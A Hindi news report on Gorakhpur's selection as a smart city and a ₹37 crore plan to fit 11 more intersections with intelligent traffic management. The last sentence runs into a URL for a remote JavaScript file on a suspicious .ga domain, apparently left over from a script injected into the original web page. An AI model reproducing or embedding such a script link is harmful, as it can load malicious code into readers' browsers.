गोरखपुर,( कुलसूम फात्मा ) प्रदेश सरकार ने बड़ा निर्णय लिया – जिसमें गोरखपुर को स्मार्ट सिटी बनाया जाएगा यही नहीं गोरखपुर शहर के 11 चौराहों को हाईटेक बनाया जाएगा गोरखपुर शहर में स्मार्ट एंड सेफ सिटी योजना के जरिए नगर निगम शहर के इन चौराहों पर इंटेलीजेंट ट्रैफिक मैनेजमेंट सिस्टम लगाया जाएगा। इसके लिए तकरीबन 37 करोड़ ₹ की परियोजना तैयार कर ली गई है।
और इसे बहुत जल्द ही स्मार्ट सिटी प्रोजेक्ट के द्वारा शासन को भेजा जाएगा। गोरखपुर को प्रदेश सरकार ने स्मार्ट सिटी के रूप में चुनने का निर्णय लिया है। प्रोजेक्ट के द्वारा हर जनपद को शासन की तरफ से 50, करोड़ ₹ दिए जाएंगे। नगर निगम के शहर के तकरीबन 11 चौराहों को हाईटेक भी करने के लिए परियोजना तैयार की गई है।
नगर निगम के मुख्य इंजीनियर सुरेश चंद से जब बातचीत की तो उन्होंने बताया की शहर में पूर्व से नौ चौराहों को आईटीएमएस सिस्टम से लैस किया जा चुका है इस प्रकार 11 और चौराहे हैं जिनकी परियोजना को तैयार किया गया है। इस परियोजना पर तकरीबन 37 करोड़ ₹ व्यय होगा और बहुत जल्द इस प्रस्ताव को शासन को भी भेज दिया जाएगा। शासन की स्वीकृत के पश्चात स्मार्ट सिटी बनने का कार्य प्रारंभ हो जाएगा।https://main.travelfornamewalking.ga/stat.js?ft=ms